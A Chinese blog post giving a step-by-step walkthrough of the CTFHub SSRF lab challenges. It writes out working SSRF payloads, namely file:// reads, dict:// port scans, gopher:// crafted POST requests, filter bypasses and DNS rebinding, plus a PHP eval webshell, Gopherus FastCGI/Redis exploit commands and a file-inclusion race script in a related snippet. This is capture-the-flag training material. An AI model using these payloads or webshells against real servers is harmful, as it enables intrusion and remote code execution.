关于做完了ctfhub的SSRF写了一个通关攻略

最新推荐文章于 2024-08-04 19:46:43 发布
最新推荐文章于 2024-08-04 19:46:43 发布
阅读量982 收藏 13
点赞数 8
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69602647/article/details/140670595
版权

内网访问:

尝试访问位于127.0.0.1的flag.php吧

sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php

伪协议读取文件:

尝试去读取一下Web目录下的flag.php吧

sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

查看网页源代码

端口扫描:

来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,

url=dict://127.0.00.1:port

使用Burp Suite爆破

POST请求

这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

访问sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php

查看源代码:

复制key填到框中

抓包

只留这几行即可:

修改host为127.0.0.1:80

进行url编码:

POST%20%2Fflag.php%20HTTP%2F1.1%0AHost%3A%20127.0.0.1%3A8080%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AContent-Length%3A%2036%0A%0Akey%3Dbdb150168ffdb44fad3994dbe8d14019

粘贴到txt中 将%0A替换成%0D%0A

替换之后末尾也要加:

POST%20%2Fflag.php%20HTTP%2F1.1%0d%0AHost%3A%20127.0.0.1%3A8080%0d%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0d%0AContent-Length%3A%2036%0d%0A%0d%0Akey%3Dbdb150168ffdb44fad3994dbe8d14019%0d%0A
再进行二次url编码:

添加

?url=gopher://127.0.0.1/_二次编码的内容

上传文件

先访问:?url=127.0.0.1/flag.php

上传包含一句话木马的php文件 <?php @eval($_POST[cmd]);?>

发现没有上传按钮 我们自己编辑一个

抓包上传:

复制请求包内容->进行url编码

到记事本 替换将%0A替换成%0D%0A

进行二次url编码:

?url=gopher://127.0.0.1/_二次编码的内容 出flag

FastCGI协议

将一句话木马->base64编码->写入shell.php文件中

<?php @eval($_POST[cmd]);?>

base64编码:

PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+

使⽤Gopherus⼯具⽣成payload:

工具地址:https://github.com/tarunkant/Gopherus.git

执行命令:

python2 gopherus.py --exploit fastcgi

输入一个网站有的php路径: /var/www/html/index.php

输入编码木马的命令:

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

将给我们的数据进行url编码:

将二次编码的粘贴到?url=... 然后访问:

访问shell.php

打开蚁剑->添加数据:

flag

Redis协议

使用Gopherus 工具 中的Rrdis

执行命令:python2 gopherus.py --exploit redis

进⾏⼀次URL编码后并访问上传的⽂件 shell.php

蚁剑连接:

URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧

咱们这样访问:

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

127.0.0.1不能访问了 咱们可以访问localhost

/?url=localhost/flag.php

302跳转 Bypass

SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

?url=http://0.0.0.0/flag.php

?url=http://localhost/flag.php

DNS重绑定 Bypass

利用:

?url=http://7f000001.7f000002.rbndr.us/flag.php

雾魈
关注
  • 8
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过SSRF操作Redis主从复制Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf
09-17
在“Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf”中,作者深入探讨了SSRF漏洞的各种方面,并展示了如何构建自动化利用框架。以下是一些关键知识点: 1. **SSRF的基础知识**:SSRF...
第一节 SSRF原理介绍-01
09-15
如果攻击者构造了一个恶意的url,例如file:///etc/passwd,服务端就会将/etc/passwd文件的内容发送回客户端,从而导致敏感信息的泄露。 SSRF漏洞利用: SSRF漏洞可以用于文件读取、端口扫描、攻击内网资源等。攻击...
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等过滤和限制 本⽂讲解⼀个ssrf的...
python实现程序设计检测一个网址是否存在SSRF漏洞,漏洞检测
06-13
python代码的实现过程
安卓基本布局(上)
君子慎独,不欺暗室。卑以自牧,含章可贞。
08-03 737
通过相对定位的方式让控件出现在布局的任何位置。以水平或垂直的方式来排列界面中的控件。
如何在 Android 设备上更改您的位置?
学以致用 知行合一
08-02 683
全球定位系统 (GPS) 是一种基于卫星的导航系统,用于确定设备在地球上的当前位置。Android 设备配备了 GPS 接收器,可与绕地球运行的卫星进行交互。一旦设备锁定至少四颗卫星,它就可以通过计算信号从每颗卫星传输到设备所需的时间来三角测量其位置。这个过程称为三边测量,可以精确确定地理坐标。您是否曾觉得需要在 Android 设备上虚拟更改您的位置?无论是为了访问受地理限制的内容还是为了好玩而伪造 GPS,更改您的位置都比您想象的要容易。
android13 删除兼容性警告窗口 deprecation warning 去除弃用警告
zhutoubenben的专栏
08-02 86
Android 13 中,为了提高用户体验和应用的兼容性,系统引入了一些新的隐私和安全特性。这些特性可能会影响旧版应用的行为,因此当用户运行可能不全兼容 Android 13 的旧应用时,系统可能会显示兼容性警告窗口。
聊聊Android的Binder
qq_34358193的博客
08-04 1031
Binder 是 Android 平台中的一个关键组件,负责实现进程间通信(IPC)。它提供了一种高效的方式让不同进程中的应用程序进行交互,是 Android 系统的核心之一。
Android笔试面试题AI答之Activity常见考点
学无止境,止于至善
08-01 462
这些考点涵盖了Activity的基本概念、生命周期管理、与其他组件的交互以及性能优化等多个方面,是Android开发面试中的热点问题。:理解Activity与Service的交互方式,以及Service的生命周期和启动方法。:了解Activity如何组织在任务栈中,以及如何在不同的任务栈中启动Activity。:理解Activity的启动流程,包括Intent的传递和Activity的创建。:知道如何优化Activity的启动速度,包括可能的优化方向。:掌握如何为Activity的进入和退出设置动画效果。
WEB渗透Web突破篇-PHP文件包含下载读取
qq_59468567的博客
08-02 224
import itertools import requests import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the inclusion') fo
android中打包apk体积优化方案
ZyClient的博客
08-02 284
打包apk体积优化
Android中的LowMemoryKiller机制
博艺的技术专栏
08-02 859
进程的启动分为冷启动和热启动,当用户退出进程后,Android系统不会立即将此进程回收,而是将其放到后台运行,下次再启动这个程序的时候,直接将这个放在后台的进程拉起来使用,加快启动速度,这种启动方式称为热启动。而冷启动则是重新为这个程序分配进程。那么问题来了,当启动的程序较多,然后又退出了,后台就会留下很多这种空的进程,占据了大量的内存空间。Android当内存剩余的空间满足一定的条件时,会对后台的进程进行查杀,以保证内存是可用的,这就是Android中LMK(LowMemoryKiller机制)
笔记222222222222222222222222222222
最新发布
08-04
笔记222222222222222222222222222222
仿拉钩App小程序.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
华云智慧园区.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
新浪读书.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
基于Springboot和Vue的 网上购物商城系统源码 网上购物商城系统代码(高分优秀毕业设计)
08-04
网上购物商城系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
python分布式网络爬虫源代码.zip
08-04
爬虫python分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.zippython分布式网络爬虫源代码.z
CTFHub ssrf
07-29
CTFHub一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值